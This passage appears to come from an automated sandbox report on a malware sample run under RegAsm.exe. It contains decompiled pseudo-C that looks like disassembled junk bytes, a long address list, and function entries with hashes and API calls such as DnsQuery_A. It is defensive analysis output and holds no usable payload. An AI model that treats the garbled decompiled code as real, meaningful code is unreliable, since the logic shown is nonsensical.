				 *_t356 =  *_t356 + 0xffffff97;
				asm("adc [esp+eax], bh");
				 *[es:edi+0x21] =  *[es:edi+0x21] + _t356;
				 *((intOrPtr*)(_t414 + 0x1110ad00)) =  *((intOrPtr*)(_t414 + 0x1110ad00)) + _t356;
				_t357 = _t356 + 0x21aa0027;
				 *_t357 =  *_t357 + _t357;
				 *_t357 =  *_t357 + _t357;
				_t358 = _t423;
				_t424 = _t357;
				asm("sbb [edi+0x22], dl");
				asm("outsb");
				 *_t358 =  *_t358 + _t424;
				 *_t453 =  *_t453 + _t414;
				 *_t358 =  *_t358 & _t358;
				 *_t358 =  *_t358 + _t358;
				 *((intOrPtr*)(_t453 - 0x6cf1dae8)) =  *((intOrPtr*)(_t453 - 0x6cf1dae8)) + _t358;
				 *_t358 =  *_t358 + _t424;
				 *((intOrPtr*)(_t453 + 0x21)) =  *((intOrPtr*)(_t453 + 0x21)) + _t435;
				 *((intOrPtr*)(_t414 + 0x4e0f6400)) =  *((intOrPtr*)(_t414 + 0x4e0f6400)) + _t358;
				_t425 = _t424 +  *_t358;
				 *_t453 =  *_t453 + _t414;
				 *_t358 =  *_t358 & _t358;
				 *_t358 =  *_t358 + _t358;
				 *((intOrPtr*)(_t453 - 0x6cf1dae8)) =  *((intOrPtr*)(_t453 - 0x6cf1dae8)) + _t358;
				 *_t425 =  *_t425 + _t425;
				 *((intOrPtr*)(_t358 + 0x32)) =  *((intOrPtr*)(_t358 + 0x32)) + _t425;
				 *_t358 =  *_t358 + _t358;
				 *_t358 =  *_t358 + _t358;
				 *_t358 =  *_t358 + 0x34;
				_t359 = _t358 & 0x0029056a;
				_push(ds);
				 *_t359 =  *_t359 & _t359;
				 *_t359 =  *_t359 + _t359;
				 *((intOrPtr*)(_t453 - 0x6cf1dae8)) =  *((intOrPtr*)(_t453 - 0x6cf1dae8)) + _t359;
				 *_t435 =  *_t435 + _t425;
				 *((intOrPtr*)(_t453 + 0x21)) =  *((intOrPtr*)(_t453 + 0x21)) + _t414;
				 *((intOrPtr*)(_t414 + 0x3c255800)) =  *((intOrPtr*)(_t414 + 0x3c255800)) + _t359;
				_t361 = _t359 + 0x2a + _t435;
				 *_t361 =  *_t361 & _t361;
				 *_t361 =  *_t361 + _t361;
				 *((intOrPtr*)(_t414 - 0x66da9900)) =  *((intOrPtr*)(_t414 - 0x66da9900)) + _t361;
				_t426 = _t425 +  *_t414;
				 *((intOrPtr*)(_t435 + _t453)) =  *((intOrPtr*)(_t435 + _t453)) + _t426;
				 *_t361 =  *_t361 + 0x7b;
				_t362 = _t361 & 0x002c057f;
				_push(ds);
				 *_t362 =  *_t362 & _t362;
				 *_t362 =  *_t362 + _t362;
				 *((intOrPtr*)(_t453 - 0x6cf1dae8)) =  *((intOrPtr*)(_t453 - 0x6cf1dae8)) + _t362;
				 *0x21e700 =  *0x21e700 + _t426;
				 *_t362 =  *_t362 + _t362;
				 *((intOrPtr*)(_t414 + 0x3c25a600)) =  *((intOrPtr*)(_t414 + 0x3c25a600)) + _t362;
				_t363 = _t362 + 0x2d;
				_t436 = _t435 + _t414;
				 *_t363 =  *_t363 & _t363;
				 *_t363 =  *_t363 + _t363;
				 *((intOrPtr*)(_t426 + 0x6e225718)) =  *((intOrPtr*)(_t426 + 0x6e225718)) + _t436;
				 *_t453 =  *_t453 + _t426;
				 *_t453 =  *_t453 + _t414;
				 *_t363 =  *_t363 & _t363;
				 *_t363 =  *_t363 + _t363;
				 *((intOrPtr*)(_t453 - 0x6cf1dae8)) =  *((intOrPtr*)(_t453 - 0x6cf1dae8)) + _t363;
				 *_t453 =  *_t453 + _t426;
				 *((intOrPtr*)(_t453 + 0x21)) =  *((intOrPtr*)(_t453 + 0x21)) + _t436;
				 *((intOrPtr*)(_t414 + 0x4e25c200)) =  *((intOrPtr*)(_t414 + 0x4e25c200)) + _t363;
				_t427 = _t426 +  *_t453;
				 *((intOrPtr*)(_t414 + _t453)) =  *((intOrPtr*)(_t414 + _t453)) + _t363;
				 *_t363 =  *_t363 + _t363;
				 *_t363 =  *_t363 + _t363;
				 *0x33 = 0x33 +  *0x33;
				 *0x33 = 0x33 +  *0x33;
				_t438 = _t436 + _t453 + _t414;
				_push(es);
				_t369 = _t363 & 0x0032064a &  *(_t363 & 0x0032064a);
				 *_t369 =  *_t369 + _t369;
				 *((intOrPtr*)(_t427 + 0x6e225718)) =  *((intOrPtr*)(_t427 + 0x6e225718)) + _t438;
				 *_t445 = _t438 +  *_t445;
				 *0x33 =  *0x33 + _t414;
				 *_t369 =  *_t369 & _t369;
				 *_t369 =  *_t369 + _t369;
				 *0xFFFFFFFF930E254B =  *((intOrPtr*)(0xffffffff930e254b)) + _t369;
				 *_t445 = _t438 +  *_t445;
				 *_t438 = _t438 +  *_t438;
				_t370 = _t369 &  *_t369;
				 *_t370 =  *_t370 + _t370;
				 *((intOrPtr*)(_t414 - 0x7cd9d500)) =  *((intOrPtr*)(_t414 - 0x7cd9d500)) + _t370;
				_push(es);
				asm("aaa");
				 *((intOrPtr*)(0x33 + _t474)) =  *((intOrPtr*)(0x33 + _t474)) + _t427;
				 *_t370 =  *_t370 + _t370;
				 *_t370 =  *_t370 + _t370;
				_t371 = 0x33;
				_t456 = _t370;
				 *((intOrPtr*)(_t445 + 0x26)) =  *((intOrPtr*)(_t445 + 0x26)) + 0x33;
				asm("clc");
				_push(es);
				if( *0x33 >= 0x33) {
					 *0x33 = 0x33 +  *0x33;
					 *0x33 = 0x33 +  *0x33;
					_t403 = _t456;
					 *((intOrPtr*)(_t445 + 0x3b075226)) =  *((intOrPtr*)(_t445 + 0x3b075226)) + _t438;
					_t403[0xd] = _t403[0xd] + _t414;
					 *0xFFFFFFFF8026A933 =  *((intOrPtr*)(0xffffffff8026a933)) + _t438;
					 *0x3be000 =  *0x3be000 | _t445;
					 *_t403 = _t403 +  *_t403;
					 *0x0D26B533 =  *((intOrPtr*)(0xd26b533)) + _t438;
					_t414 = _t414 |  *0x33;
					 *_t445 =  *_t445 + _t427;
					_t371 = 0x33;
					_t456 = _t403;
					 *0x79EEBF5D =  *((intOrPtr*)(0x79eebf5d)) + _t438;
				}
				 *0x22 =  *0x22 + _t438;
				_t456[0x1c837bc2] = _t371 + _t456[0x1c837bc2];
				 *_t414 = _t371 +  *_t414;
				asm("sbb eax, 0x22");
				 *((intOrPtr*)(_t456 - 0x66d8e0f8)) =  *((intOrPtr*)(_t456 - 0x66d8e0f8)) + _t371;
				_t373 = _t371 +  *_t414 &  *[es:eax];
				 *_t373 =  *_t373 + _t373;
				_t456[0x689ca02] = _t456[0x689ca02] + _t373;
				 *((intOrPtr*)(_t373 + _t373 + 0x2e)) =  *((intOrPtr*)(_t373 + _t373 + 0x2e)) + _t373;
				_t374 = _t373 &  *_t373;
				 *_t374 =  *_t374 + _t374;
				 *((intOrPtr*)(_t456 - 0x77d8cdf8)) =  *((intOrPtr*)(_t456 - 0x77d8cdf8)) + _t374;
				_t375 = _t374 |  *(_t374 + _t374 + 0x1e);
				 *_t375 =  *_t375 & _t375;
				 *_t375 =  *_t375 + _t375;
				 *((intOrPtr*)(_t456 - 0x6cf1dae8)) =  *((intOrPtr*)(_t456 - 0x6cf1dae8)) + _t375;
				 *0x39E45637 =  *0x39E45637 + _t375;
				asm("aaa");
				_t376 = _t375 &  *_t375;
				 *_t376 =  *_t376 + _t376;
				 *((intOrPtr*)(_t456 - 0x72f1dae8)) =  *((intOrPtr*)(_t456 - 0x72f1dae8)) + _t376;
				_t377 = _t376 |  *0x39E45637;
				_push(ds);
				 *_t377 =  *_t377 & _t377;
				 *_t377 =  *_t377 + _t377;
				 *((intOrPtr*)(_t456 - 0x6cf1dae8)) =  *((intOrPtr*)(_t456 - 0x6cf1dae8)) + _t377;
				 *_t445 =  *_t445 + _t377;
				_t471 = 0x39e45636;
				_t378 = _t377 &  *_t377;
				 *_t378 =  *_t378 + _t378;
				 *((intOrPtr*)(_t414 - 0x15ed5a00)) =  *((intOrPtr*)(_t414 - 0x15ed5a00)) + _t378;
				 *_t445 =  *_t445 | _t378;
				_push(ds);
				 *_t378 =  *_t378 & _t378;
				 *_t378 =  *_t378 + _t378;
				 *((intOrPtr*)(_t456 - 0x6cf1dae8)) =  *((intOrPtr*)(_t456 - 0x6cf1dae8)) + _t378;
				 *_t378 =  *_t378 + _t427;
				asm("pushad");
				_t379 = _t378 &  *_t378;
				 *_t379 =  *_t379 + _t379;
				 *((intOrPtr*)(_t414 - 0x15ed3700)) =  *((intOrPtr*)(_t414 - 0x15ed3700)) + _t379;
				 *_t379 =  *_t379 | _t427;
				_push(ds);
				 *_t379 =  *_t379 & _t379;
				 *_t379 =  *_t379 + _t379;
				 *((intOrPtr*)(_t456 - 0x6cf1dae8)) =  *((intOrPtr*)(_t456 - 0x6cf1dae8)) + _t379;
				 *_t427 =  *_t427 + _t427;
				_t380 = _t379 ^ 0x0000003f;
				 *_t380 =  *_t380 + _t380;
				 *_t380 =  *_t380 + _t380;
				 *_t380 =  *_t380 + 0xffffffe2;
				asm("adc ch, dl");
				 *_t427 =  *_t427 | _t427;
				if( *_t427 == 0) {
					 *_t380 =  *_t380 + _t380;
					 *_t380 =  *_t380 + _t380;
					_t268 = _t380;
					_t380 = _t427;
					_t427 = _t268;
					asm("sbb [edi+0x22], dl");
					asm("outsb");
					 *_t438 =  *_t438 + _t427;
					_push(ds);
					 *_t380 =  *_t380 & _t380;
					 *_t380 =  *_t380 + _t380;
					 *((intOrPtr*)(_t456 - 0x6cf1dae8)) =  *((intOrPtr*)(_t456 - 0x6cf1dae8)) + _t380;
					 *_t438 =  *_t438 + _t427;
					 *_t438 =  *_t438 & 0x00000000;
					 *_t380 =  *_t380 + 0x2f;
				}
				asm("das");
				asm("adc bl, [edx]");
				 *_t438 =  *_t438 | _t427;
				asm("adc ah, [edx]");
				 *_t380 =  *_t380 + _t380;
				 *_t380 =  *_t380 + _t380;
				 *_t380 =  *_t380 + 0x4c;
				asm("adc bh, [eax]");
				 *_t414 =  *_t414 | _t427;
				 *_t438 = _t474;
				 *_t380 =  *_t380 + _t380;
				 *_t380 =  *_t380 + _t380;
				 *_t380 =  *_t380 + 0x71;
				asm("adc bh, [ecx+0x8]");
				 *_t438 = _t438 +  *_t438;
				 *_t380 =  *_t380 + 0xffffff8e;
				asm("adc ch, [ebx+0x1e004d08]");
				 *_t380 =  *_t380 & _t380;
				 *_t380 =  *_t380 + _t380;
				 *((intOrPtr*)(_t456 - 0x6cf1dae8)) =  *((intOrPtr*)(_t456 - 0x6cf1dae8)) + _t380;
				 *_t456 =  *_t456 + _t427;
				asm("aas");
				 *_t380 =  *_t380 + _t380;
				 *_t380 =  *_t380 + _t380;
				 *_t380 =  *_t380 + 0xffffffec;
				asm("adc ecx, ecx");
				 *_t456 =  *_t456 | _t427;
				asm("pushfd");
				_t381 = _t380 &  *_t380;
				 *_t381 =  *_t381 + _t381;
				 *((intOrPtr*)(_t427 + 0x6e225718)) =  *((intOrPtr*)(_t427 + 0x6e225718)) + _t438;
				 *_t445 =  *_t445 + _t427;
				_push(ds);
				 *_t381 =  *_t381 & _t381;
				 *_t381 =  *_t381 + _t381;
				 *((intOrPtr*)(_t456 - 0x6cf1dae8)) =  *((intOrPtr*)(_t456 - 0x6cf1dae8)) + _t381;
				 *_t445 =  *_t445 + _t427;
				 *_t381 =  *_t381 + _t381;
				 *_t381 =  *_t381 + _t381;
				 *_t381 =  *_t381 + 0x26;
				asm("adc al, 0xc9");
				 *_t445 =  *_t445 | _t427;
				asm("int3");
				asm("aas");
				 *_t381 =  *_t381 + _t381;
				 *_t381 =  *_t381 + _t381;
				_t383 = _t456 + _t414;
				asm("daa");
				 *_t414 =  *_t414 - _t427;
				_push(_t383);
				 *((intOrPtr*)(_t383 + 0x40)) =  *((intOrPtr*)(_t383 + 0x40)) + _t383;
				 *_t383 =  *_t383 + _t383;
				 *_t383 =  *_t383 + _t383;
				_t385 = _t381 + _t414;
				asm("daa");
				_t440 =  &(_t438[0]) | _t438[0];
				asm("loopne 0x42");
				 *_t385 =  *_t385 + _t385;
				 *_t385 =  *_t385 + _t385;
				asm("daa");
				 *_t414 = _t427;
				_t388 = _t383 + _t414 + _t440;
				_t429 =  *_t414 + 1;
				 *_t388 =  *_t388 + _t388;
				 *_t388 =  *_t388 + _t388;
				asm("daa");
				_t391 = _t471;
				 *_t391 =  *_t391 + _t429;
				_t441 = _t440 + 1;
				 *_t391 =  *_t391 + _t391;
				 *_t391 =  *_t391 + _t391;
				_t393 = _t388 + 0xb;
				asm("daa");
				asm("fisttp qword [ebx]");
				 *((intOrPtr*)(_t441 + _t393 * 2)) =  *((intOrPtr*)(_t441 + _t393 * 2)) + 0xb;
				 *_t393 =  *_t393 + _t393;
				 *_t393 =  *_t393 + _t393;
				_t394 = _t391;
				_t462 = _t393;
				 *((intOrPtr*)(_t394 + _t471 - 4)) =  *((intOrPtr*)(_t394 + _t471 - 4)) + _t394;
				_t416 = 0x0000000b |  *_t462;
				asm("pushfd");
				_t442 = _t441 + 1;
				 *_t394 =  *_t394 + _t394;
				 *_t394 =  *_t394 + _t394;
				asm("daa");
				_t398 = (_t462 + _t416 | 0x00000060) + _t442;
				_t417 = _t416 + 1;
				 *_t398 =  *_t398 + _t398;
				 *_t398 =  *_t398 + _t398;
				_t399 = _t394;
				 *((intOrPtr*)(_t417 + 0x640c5b28)) =  *((intOrPtr*)(_t417 + 0x640c5b28)) + _t399;
				 *_t399 =  *_t399 + _t399;
				 *_t399 =  *_t399 + _t399;
				 *_t399 =  *_t399 + _t399;
				_t400 = _t398;
				_t465 = _t399;
				 *((intOrPtr*)(_t471 - 1 + 0x650c8028)) =  *((intOrPtr*)(_t471 - 1 + 0x650c8028)) + _t429;
				 *((intOrPtr*)(_t400 + 0x44)) =  *((intOrPtr*)(_t400 + 0x44)) + _t442;
				 *((intOrPtr*)(_t465 - 0x3ad74d00)) =  *((intOrPtr*)(_t465 - 0x3ad74d00)) + _t442;
				_t401 = _t400 | 0x00000068;
				 *_t465 =  *_t465 + _t417;
				 *_t401 =  *_t401 & _t401;
				 *_t401 =  *_t401 + _t401;
				 *((intOrPtr*)(_t465 - 0x6cf1dae8)) =  *((intOrPtr*)(_t465 - 0x6cf1dae8)) + _t401;
				 *_t429 =  *_t429 + _t429;
				 *_t401 =  *_t401 + _t401;
				 *_t401 =  *_t401 + _t401;
				 *_t401 =  *_t401 + 0xffffffc3;
				asm("adc al, 0x3c");
				_t402 = _t401 + 0x69;
				 *_t465 =  *_t465 + _t417;
				 *_t402 =  *_t402 & _t402;
				 *_t402 =  *_t402 + _t402;
				 *((intOrPtr*)(_t465 - 0x6cf1dae8)) =  *((intOrPtr*)(_t465 - 0x6cf1dae8)) + _t402;
				 *_t442 =  *_t442 + 0x22;
				return _t402;
			}

0x010270ce
0x010270d3
0x010270d9
0x010270da
0x010270db
0x010270dd
0x010270e3
0x010270e7
0x010270e9
0x010270eb
0x010270ed
0x010270ef
0x010270f5
0x010270fb
0x010270fd
0x010270fe
0x010270ff
0x01027101
0x01027103
0x01027104
0x01027105
0x01027107
0x01027109
0x0102710a
0x0102710b
0x0102710d
0x01027110
0x01027115
0x01027116
0x01027117
0x01027119
0x01027120
0x01027124
0x01027125
0x01027128
0x01027129
0x0102712b
0x01027131
0x01027137
0x0102713a
0x0102713f
0x01027142
0x01027146
0x01027147
0x01027149
0x0102714b
0x0102714f
0x01027152
0x01027153
0x01027155
0x01027157
0x0102715b
0x01027163
0x01027166
0x0102716d
0x0102716f
0x0102717b
0x0102717c
0x0102717d
0x0102717f
0x01027186
0x0102718c
0x01027198
0x0102719f
0x010271a5
0x010271a7
0x010271a9
0x010271ab
0x010271ad
0x010271af
0x010271b1
0x010271b7
0x010271c3
0x010271cf
0x010271d5
0x010271db
0x010271e1
0x010271e3
0x010271e5
0x010271e8
0x010271e9
0x010271eb
0x010271f3
0x010271f5
0x010271f7
0x010271fa
0x010271fb
0x010271fd
0x01027203
0x0102720a
0x0102720f
0x01027212
0x01027213
0x01027215
0x0102721b
0x01027221
0x01027227
0x0102722c
0x0102722e
0x01027236
0x01027237
0x01027246
0x01027252
0x01027255
0x01027257
0x0102725e
0x0102725f
0x01027262
0x01027266
0x01027268
0x01027269
0x0102726f
0x01027271
0x01027273
0x01027275
0x0102727b
0x0102727d
0x0102727f
0x01027281
0x01027283
0x01027289
0x0102728f
0x01027291
0x01027297
0x01027299
0x0102729b
0x0102729d
0x0102729f
0x010272a5
0x010272a7
0x010272a9
0x010272ab
0x010272ad
0x010272b3
0x010272b5
0x010272b7
0x010272b9
0x010272bb
0x010272c1
0x010272c3
0x010272c9
0x010272cf
0x010272d1
0x010272d3
0x010272d5
0x010272d7
0x010272dd
0x010272df
0x010272e1
0x010272e3
0x010272e5
0x010272eb
0x010272ed
0x010272f0
0x010272f2
0x010272f4
0x010272f4
0x010272f5
0x010272fd
0x010272fe
0x01027300
0x01027302
0x01027303
0x01027309
0x0102730c
0x0102730e
0x01027310
0x01027310
0x01027311
0x01027319
0x0102731b
0x0102731d
0x01027323
0x01027326
0x01027329
0x0102732b
0x01027331
0x01027334
0x01027335
0x01027337
0x01027339
0x0102733f
0x01027342
0x01027343
0x01027345
0x01027347
0x0102734d
0x01027350
0x01027351
0x01027353
0x01027355
0x0102735b
0x0102735e
0x01027360
0x01027362
0x01027365
0x01027367
0x01027369
0x0102736c
0x0102736e
0x01027370
0x01027372
0x01027372
0x01027373
0x01027375
0x01027377
0x0102737d
0x0102737f
0x01027385
0x01027387
0x0102738d
0x01027393
0x01027395
0x01027397
0x01027399
0x0102739b
0x010273a1
0x010273a3
0x010273a7
0x010273a9
0x010273af
0x010273b1
0x010273b3
0x010273b5
0x010273b7
0x010273bd
0x010273bf
0x010273c6
0x010273c6
0x010273c7
0x010273c7
0x010273ce
0x010273d0
0x010273d2
0x010273d4
0x010273d5
0x010273d8
0x010273da
0x010273dc
0x010273e1
0x010273e7
0x010273e9
0x010273f1
0x010273f4
0x010273f9
0x010273f9
0x010273fb
0x010273fd
0x01027403
0x01027409
0x0102740b
0x0102740c
0x0102740c
0x0102740d
0x01027413
0x01027415
0x01027418
0x0102741a
0x0102741a
0x0102741b
0x01027421
0x01027427
0x0102742d
0x0102742f
0x01027431
0x01027433
0x01027435
0x0102743b
0x01027441
0x01027443
0x01027449
0x0102744f
0x01027451
0x01027457
0x01027459
0x0102745c
0x0102745e
0x01027460
0x01027463
0x01027466
0x0102746d
0x01027473
0x01027478
0x0102747a
0x0102747c
0x0102747c
0x0102747d
0x01027480
0x01027481
0x01027483
0x01027485
0x01027487
0x01027489
0x0102748f
0x01027491
0x01027497
0x0102749d
0x0102749f
0x010274a1
0x010274a3
0x010274a5
0x010274ab
0x010274ad
0x010274b0
0x010274b2
0x010274b4
0x010274b7
0x010274bc
0x010274bd
0x010274bf
0x010274c1
0x010274c7
0x010274c9
0x010274cf
0x010274d7
0x010274d9
0x010274db
0x010274dd
0x010274e3
0x010274e5
0x010274ec
0x010274ef
0x010274f4
0x010274f5
0x010274f7
0x010274f9
0x010274ff
0x01027505
0x01027507
0x0102750d
0x0102750f
0x01027511
0x01027513
0x01027515
0x0102751b
0x0102751d
0x0102751f
0x01027521
0x01027523
0x01027529
0x0102752b
0x01027531
0x01027537
0x01027539
0x0102753c
0x0102753e
0x0102754a
0x0102754c
0x0102754f
0x01027556
0x01027557
0x01027559
0x0102755b
0x01027561
0x01027563
0x01027565
0x01027567
0x01027569
0x0102756f
0x01027571
0x01027573
0x01027575
0x01027577
0x0102757d
0x0102757e
0x0102757f
0x01027582
0x01027584
0x01027586
0x01027586
0x01027587
0x0102758a
0x0102758b
0x0102758e
0x01027590
0x01027592
0x01027594
0x01027595
0x0102759b
0x010275a1
0x010275a7
0x010275ad
0x010275af
0x010275b5
0x010275b7
0x010275be
0x010275be
0x010275bf
0x010275bf
0x010275c5
0x010275cb
0x010275d1
0x010275d4
0x010275d9
0x010275e2
0x010275e5
0x010275e7
0x010275ed
0x010275f1
0x010275f3
0x010275f5
0x010275fb
0x010275ff
0x01027601
0x01027603
0x01027609
0x0102760c
0x0102760d
0x0102760f
0x01027611
0x01027617
0x0102761a
0x0102761b
0x0102761d
0x0102761f
0x01027625
0x01027628
0x01027629
0x0102762b
0x0102762d
0x01027633
0x01027636
0x01027637
0x01027639
0x0102763b
0x01027641
0x01027644
0x01027645
0x01027647
0x01027649
0x0102764f
0x01027652
0x01027653
0x01027655
0x01027657
0x0102765d
0x01027660
0x01027662
0x01027664
0x01027666
0x01027669
0x0102766b
0x0102766e
0x01027670
0x01027672
0x01027674
0x01027674
0x01027674
0x01027675
0x01027678
0x01027679
0x0102767c
0x0102767d
0x0102767f
0x01027681
0x01027687
0x0102768a
0x01027690
0x01027690
0x01027692
0x01027693
0x01027695
0x01027698
0x0102769a
0x0102769c
0x0102769e
0x010276a1
0x010276a3
0x010276a6
0x010276a8
0x010276aa
0x010276ac
0x010276af
0x010276b3
0x010276ba
0x010276bd
0x010276c3
0x010276c5
0x010276c7
0x010276cd
0x010276d0
0x010276d2
0x010276d4
0x010276d6
0x010276d9
0x010276db
0x010276de
0x010276df
0x010276e1
0x010276e3
0x010276e9
0x010276ec
0x010276ed
0x010276ef
0x010276f1
0x010276f7
0x010276fc
0x010276fe
0x01027700
0x01027703
0x01027705
0x01027708
0x01027709
0x0102770a
0x0102770c
0x0102770f
0x01027711
0x01027712
0x01027714
0x01027715
0x01027718
0x0102771a
0x0102771d
0x0102771f
0x01027721
0x01027724
0x01027726
0x01027728
0x0102772d
0x0102772e
0x01027731
0x01027733
0x01027734
0x01027736
0x0102773b
0x0102773e
0x0102773f
0x01027741
0x01027742
0x01027744
0x01027747
0x01027749
0x0102774a
0x0102774d
0x01027750
0x01027752
0x01027754
0x01027754
0x01027755
0x01027759
0x0102775c
0x0102775d
0x0102775e
0x01027760
0x01027765
0x01027769
0x0102776b
0x0102776c
0x0102776e
0x01027770
0x01027771
0x01027777
0x0102777a
0x0102777c
0x0102777e
0x0102777e
0x0102777f
0x01027785
0x0102778b
0x01027791
0x01027793
0x01027795
0x01027797
0x01027799
0x0102779f
0x010277a4
0x010277a6
0x010277a8
0x010277ab
0x010277ad
0x010277af
0x010277b1
0x010277b3
0x010277b5
0x010277bb
0x010277be

Memory Dump Source

Source File: 00000000.00000002.504689219.0000000000F92000.00000002.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.504633426.0000000000F90000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.505311798.0000000001032000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca48e5bd98bc7c9fb95073f62997c03d31d2be9323ca63c89182c596671d237d
Instruction ID: 8d0577979551ac3d2f0aaf512977f4bb8064e14566cbc253855801a99511debe
Opcode Fuzzy Hash: ca48e5bd98bc7c9fb95073f62997c03d31d2be9323ca63c89182c596671d237d
Instruction Fuzzy Hash: F142EC6158E3D25FD7138B748CB5582BFB0AE1312475E8ADFC0C1CB8E3E258599AC762

Uniqueness

Uniqueness Score: -1.00%

Function 017904E1, Relevance: .3, Instructions: 273COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.507222985.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5dc553146fae7839914fbcf095510311bdeaf9e2b6a630b898e5b5695f135340
Instruction ID: 792e1a37dedcbaa95b8fa465b16cd06f416a4039721681c28361640e20879895
Opcode Fuzzy Hash: 5dc553146fae7839914fbcf095510311bdeaf9e2b6a630b898e5b5695f135340
Instruction Fuzzy Hash: 88D10630C2074A8ACB11EBA4D990AADF375FF96300F50D79AE5097B215FB706AC8CB51

Uniqueness

Uniqueness Score: -1.00%

Function 017904F0, Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.507222985.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7edb4a8c2cba314a719187db0d75f603a867ee81949d3636ca57edd562f7ea8
Instruction ID: 1f4e6e953741f5107c99a5088f135a964f791ef10fd82a18e4c3612c295cd71f
Opcode Fuzzy Hash: c7edb4a8c2cba314a719187db0d75f603a867ee81949d3636ca57edd562f7ea8
Instruction Fuzzy Hash: 69D1F730D2074A8ACB11EBA4D990AADF375FF95300F60D79AE50977215FB706AC8CB51

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegAsm.exe PID: 6916 Parent PID: 6620 RegAsm.exeCOMMON

Executed Functions

Function 0315FB00, Relevance: 1.7, APIs: 1, Instructions: 235COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.507504955.0000000003150000.00000040.00000001.sdmp, Offset: 03150000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6840650e0eb0aecbf9757e7851776582330174529e8593497cca69cf6e28a1a1
Instruction ID: 47cec403110eff5907248af5ba5dfc857d0d11ce345e198f5f1b96cf4199ee64
Opcode Fuzzy Hash: 6840650e0eb0aecbf9757e7851776582330174529e8593497cca69cf6e28a1a1
Instruction Fuzzy Hash: EB915B71909388DFCB02CFA5D890ACDBFB5EF4A304F19819AE854AB262D7359846CF51

Uniqueness

Uniqueness Score: -1.00%

Function 06E92EB0, Relevance: 1.7, APIs: 1, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.515100634.0000000006E90000.00000040.00000001.sdmp, Offset: 06E90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e78800533a9896b7cad0e889237e181e114df0af5548132f2902bb367f973f2a
Instruction ID: 4fc6545db6b22b4cdc41c7eac84b9d7f082f523a3cf05794f615c07162f1badb
Opcode Fuzzy Hash: e78800533a9896b7cad0e889237e181e114df0af5548132f2902bb367f973f2a
Instruction Fuzzy Hash: 6D8147B1D143599FDF10CFA5C8806DEBBB6FF49308F20852AD915BB250EB709949CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 031593E8, Relevance: 1.7, APIs: 1, Instructions: 194COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 0315962E

Memory Dump Source

Source File: 00000004.00000002.507504955.0000000003150000.00000040.00000001.sdmp, Offset: 03150000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 7240db6f2c4c0aa84d43fd7bc27eef281655898177cefba77fedb1afecfeedc3
Instruction ID: 1fa930160ff377315c2302768870dd2a6d35284c939990578281d2ec49065011
Opcode Fuzzy Hash: 7240db6f2c4c0aa84d43fd7bc27eef281655898177cefba77fedb1afecfeedc3
Instruction Fuzzy Hash: 86712670A00B05CFD724DF29D54575ABBF5BF88204F04896EE89AD7A50EB74E805CB91

Uniqueness

Uniqueness Score: -1.00%

Function 06E92F5C, Relevance: 1.6, APIs: 1, Instructions: 141networkCOMMON

Download Yara Rule

APIs

DnsQuery_A.DNSAPI(?,?,?,?,?,?), ref: 06E93090

Memory Dump Source

Source File: 00000004.00000002.515100634.0000000006E90000.00000040.00000001.sdmp, Offset: 06E90000, based on PE: false

Similarity

API ID: Query_
String ID:
API String ID: 428220571-0
Opcode ID: 93fe79419d98ad8a6fbbfde298f31cea49b6bca6052ccf79364c5fcd7d1b8993
Instruction ID: 39727245a4aa6c6a5bfa7374ffaf849f90ba8c763a0a111ffbd6f1e20a7531ba
Opcode Fuzzy Hash: 93fe79419d98ad8a6fbbfde298f31cea49b6bca6052ccf79364c5fcd7d1b8993
Instruction Fuzzy Hash: 3851F4B1D0035C9FDF10CFA9C9806DEBBB6FF49318F24812AE815A7250EB709945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 06E924E4, Relevance: 1.6, APIs: 1, Instructions: 140networkCOMMON

Download Yara Rule

APIs

DnsQuery_A.DNSAPI(?,?,?,?,?,?), ref: 06E93090

Memory Dump Source

Source File: 00000004.00000002.515100634.0000000006E90000.00000040.00000001.sdmp, Offset: 06E90000, based on PE: false

Similarity

API ID: Query_
String ID:
API String ID: 428220571-0
Opcode ID: ad9bfa6972f6a56059e613a0af37a834b6990758c6f72eb88dac539ce0d3c293
Instruction ID: b0a7615b2d68dfb1137c3f2496555592204c30882075e37bac2ee27625126319
Opcode Fuzzy Hash: ad9bfa6972f6a56059e613a0af37a834b6990758c6f72eb88dac539ce0d3c293
Instruction Fuzzy Hash: 3D51F470D0035C9FDF10CFA9C9806DEBBB6FF49308F248129E815AB250EB709945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0315D9E8, Relevance: 1.6, APIs: 1, Instructions: 130COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0315FD0A

Memory Dump Source

Source File: 00000004.00000002.507504955.0000000003150000.00000040.00000001.sdmp, Offset: 03150000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 1e2cb608a6ad5ba30cfa305de831339a619a8b9b12d2ff73e6d531d53067aad9
Instruction ID: 94e926236a4445bd91cd4116a7312a10c0ee08e0457294f50f7aebafa5b6ea8d
Opcode Fuzzy Hash: 1e2cb608a6ad5ba30cfa305de831339a619a8b9b12d2ff73e6d531d53067aad9
Instruction Fuzzy Hash: 395100B1D04348DFDB15CFA9D884ADEBBB5BF49314F24812AE829AB211D7709885CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0315DA04, Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0315FD0A

Memory Dump Source

